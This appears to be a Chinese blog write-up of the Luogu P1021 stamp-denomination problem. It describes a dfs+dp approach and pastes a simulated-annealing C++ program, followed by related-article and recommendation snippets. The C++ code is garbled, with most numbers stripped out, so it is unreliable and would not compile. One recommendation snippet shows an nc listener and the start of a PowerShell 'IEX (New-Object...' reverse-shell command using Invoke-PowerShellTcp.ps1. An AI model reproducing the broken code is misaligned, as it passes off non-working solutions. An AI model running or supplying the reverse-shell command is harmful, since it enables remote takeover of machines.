正解:dfs+dp

解题报告:

传送门!

第一眼以为小凯的疑惑

ummm说实话没看标签我还真没想到正解:D

本来以为这么多年前的noip应该不会很难:D

看来还是太菜了鸭QAQ

然后听说题解都可以被6,6 or 7,8的数据卡掉?

不管不管先把题解的思路放下qwq

(话说其实我觉得虽然会被卡掉但其实还挺妙的了呢,,,至少我这种菜鸡想不出来,,,好傻逼啊我QAQ

大概说下,就是dfs+dp(,,,我好像说了句废话?QAQ

分别详细说下这俩趴qwq

dfs(i,mx):枚举到第i个数了,然后连续最大能表示数是mx

然后显然可以让邮票面值单调递增,且第i个不能大于mx+1(否则mx+1就无法表示了QAQ)

然后每次dp算下能表示的mx,继续dfs

dp(i):第1到第i个数的连续最大能表示数

开个f[i]存的是i最少可以用几张邮票表示

然后就可以了qwq

但是似乎复杂度是错的,,,

然后另外一个正解是打表,,,

umm,,,算了我放弃我估计我是搞不出来了的QAQ

不过研究了半天之后在讨论区看到说模拟退火可以过这题?

然而好像又说7 8的数据是不欧克的,也不知道是时间不欧克还是答案是WA的鸭QAQ

不管先先放下讨论区里大佬说的模拟退火的代码qwq

现在是先看不懂的QAQ就只是mk下不会研究,等学了之后再说QAQ

#include<iostream>
#include<cstring>
using namespace std;
][];//[num][used]
];
];
],maxnum;
;
,times=;//not best
bool rand(int mdf){
    +))%>rate);
}
int n,k;
int fcannot,lastcan;
int now;
int main(){
    cin>>n>>k;

    for(int _233=times;_233;_233--){
        memset(can,,sizeof(can));
        memset(cangen,,sizeof(cangen));
        can[][]=true;
        cangen[]=true;
        choose[]=;
        ;i<=n;i++){
            can[i][i]=true;
            cangen[i]=true;
        }
        fcannot=n+;
        lastcan=n;
        ;i<k;i++){
            ;j++){
                if(!cangen[j]){
                    fcannot=j;
                    break;
                }
            }
            now=fcannot;
            ;j<;j++){
                if(rand(j)){
                    >choose[i-]){
                        now-=;
                    }else{
                        break;
                    }
                }
            }
            choose[i]=now;
            ;i<=lastcan;i++){
                ;j<n;j++){
                    if(can[i][j]){
                        )continue;
                        can[i+now][j+]=true;
                        cangen[i+now]=true;
                        lastcan=max(lastcan,i+now);
                    }
                }
            }
        }
        ;j++){
            if(!cangen[j]){
                fcannot=j;
                break;
            }
        }
        fcannot--;
        if(fcannot>maxnum){
            ;i<;i++){
                bestsel[i]=choose[i];
            }
            maxnum=fcannot;
        }
    }
    ;i<k;i++){
        cout<<bestsel[i]<<" ";
    }
    cout<<endl;
    cout<<"MAX="<<maxnum;
}

QAQQQQQ

洛谷P1021邮票面值设计 [noip1999] dp+搜索的更多相关文章

  1. 洛谷P1021 邮票面值设计

    题目描述 给定一个信封,最多只允许粘贴N张邮票,计算在给定K(N+K≤15)种邮票的情况下(假定所有的邮票数量都足够),如何设计邮票的面值,能得到最大值MAX,使在1-MAX之间的每一个邮资值都能得到 ...

  2. 洛谷 P1021 邮票面值设计

    题目描述 给定一个信封,最多只允许粘贴N张邮票,计算在给定K(N+K≤15)种邮票的情况下(假定所有的邮票数量都足够),如何设计邮票的面值,能得到最大值MAX,使在1-MAX之间的每一个邮资值都能得到 ...

  3. 洛谷——P1021 邮票面值设计

    https://www.luogu.org/problem/show?pid=1021 题目描述 给定一个信封,最多只允许粘贴N张邮票,计算在给定K(N+K≤15)种邮票的情况下(假定所有的邮票数量都 ...

  4. 洛谷P1021邮票面值设计

    题目 一道很经典的搜索题,可以锻炼搜索的能力,比如可以用dfs覆盖加dp的方式来寻找+更新答案.而且还可以通过在递归中增加数组的方式来辅助搜索. #include <bits/stdc++.h& ...

  5. P1021 邮票面值设计(dfs+背包dp)

    P1021 邮票面值设计 题目传送门 题意: 给定一个信封,最多只允许粘贴N张邮票,计算在给定K(N+K≤15N+K≤15)种邮票的情况下 (假定所有的邮票数量都足够),如何设计邮票的面值,能得到最大 ...

  6. P1021 邮票面值设计

    P1021 邮票面值设计 题目描述 给定一个信封,最多只允许粘贴N张邮票,计算在给定K(N+K≤15)种邮票的情况下(假定所有的邮票数量都足够),如何设计邮票的面值,能得到最大值MAX,使在1-MAX ...

  7. P1021 邮票面值设计——搜索+完全背包

    P1021 邮票面值设计 题目意思是你最多用n张邮票,你可以自己设定k种邮票的面值,每种邮票数量无穷,你最多能用这k种邮票在不超过n张的情况下,组合成的价值要求是从1开始连续的, 求最大能连续到多少: ...

  8. [NOIP1999提高] CODEVS 1047 邮票面值设计(dfs+dp)

    dfs出邮票的各种面值,然后dp求解. ------------------------------------------------------------------------------- ...

  9. 洛谷 P2725 邮票 Stamps Label:DP

    题目背景 给一组 N 枚邮票的面值集合(如,{1 分,3 分})和一个上限 K —— 表示信封上能够贴 K 张邮票.计算从 1 到 M 的最大连续可贴出的邮资. 题目描述 例如,假设有 1 分和 3 ...

随机推荐

  1. MySQL优化器 --- index_merge

    [背景] 对于关系数据库中的一张表,通常来说数据页面的总大小要比较某一个索引占用的页面要大的多(上面说的索引是不包涵主键索引的); 更进一步我们可以推导出,如果我们通过读索引就能解决问题,那么它相比读 ...

  2. csproj文件中copy指令的使用方式

    实际开发中有很多项目需要引用第三方的dll或者资源文件,且文件比较多,在运行时这些文件需要被拷贝到BIN目录. 使用VS自带的"复制到输出目录",似然方便,但是比较不零活,经过多次 ...

  3. Cocos 更新时反复杀进程,导致差异更新失效的Bug

    Cocos 更新时反复杀进程时,差异更新失效的问题: 问题复现步骤: 1.在project.manifest.temp 文件下载成功后,下载Assets资源的时候杀掉进程 2.重启游戏,继续更新时会使 ...

  4. Get shell By Powershell

    Invoke-PowerShellTcp.ps1 监听主机:nc -nv -l -p 9999 powershell -nop -exec bypass -c "IEX (New-Objec ...

  5. 看雪CTF第十四题

    from z3 import * dest=[] s = Solver() data = [, , , , , , , , , , , , , , , , , , , , , , , , , , , ...

  6. XCode10 运行app报错

    原因很简单:Xcode10起,苹果摒弃了对libstdc++库的支持转而支持libc++库了.为了保证老代码能跑,必须将几个库复制到对应文件夹(见后).同时修改Build Phases中的Link B ...

  7. 让windows 2003启动后直接进入桌面

    windows 2003启动后进入桌面需要解决的几个问题 1.如何去除掉 ctrl+alt+del的提示界面 2.如何设置自动登录的用户名密码 3.在异常启动时会出现关闭事件跟踪程序 也会导致不能直接 ...

  8. 居于U2000手机管理光猫,小区运营商FTTH光猫注册神器,MA5680T手机管理,自动添加光猫

    此软件居于U2000开发,需要U2000管理支持 主要功能: 光猫查看->上线情况.下线原因.下线时间.光猫重启.光模块发送功能.接收功能.温度 Radius诊断->用户基本信息.拨打电话 ...

  9. Python学习笔记(一):Python代码的打包与发布

    在python程序中,一个.py文件被当作一个模块,在各个模块中定义了不同的函数.当我们要使用某一个模块中的某一个函数时,首先须将这个模块导入,否则就会出现函数未定义的情况. 下面记录的是打包及安装包 ...

  10. HAWQ配置之HDFS HA

    一.在ambari管理界面启用HDFS HA 在ambari中这步很简单,在所有安装的服务都正常之后,在HDFS的服务界面中,点击下拉菜单“Actions”,选择启用HDFS HA项 “Enable ...